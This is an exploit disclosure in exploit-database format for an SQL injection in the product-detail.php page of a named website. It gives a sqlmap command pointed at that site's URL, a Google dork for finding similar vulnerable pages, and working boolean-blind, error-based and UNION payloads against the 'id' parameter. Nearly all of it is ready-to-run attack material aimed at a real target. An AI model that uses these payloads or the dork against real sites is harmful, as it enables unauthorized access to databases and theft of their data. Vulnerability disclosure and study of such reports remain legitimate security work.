****************************
#Exploit Title: TEJASVANI - SQL Injection vulnerability
#Date: 2020-08-31
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://tejasvani.online
#Google Dork: item.php?id=
#Tested On: windows 10
sqlmap:
sqlmap -u "http://tejasvani.online/product-detail.php?id=282&sid=27" --dbs
Testing Method;
- boolean-based blind
- UNION query
- error-based
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (5027=5027) THEN 5027 ELSE 5027*(SELECT 5027 FROM INFORMATION_SCHEMA.PLUGINS) END))&sid=27
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=282 AND (SELECT 5420 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5420=5420,1))),0x716b787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&sid=27
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=282 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767071,0x6f66556b52525170727a70636c7648516865634575754e4e655879434b4f50466c4565786a6e7956,0x716b787671),NULL-- cANE&sid=27
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************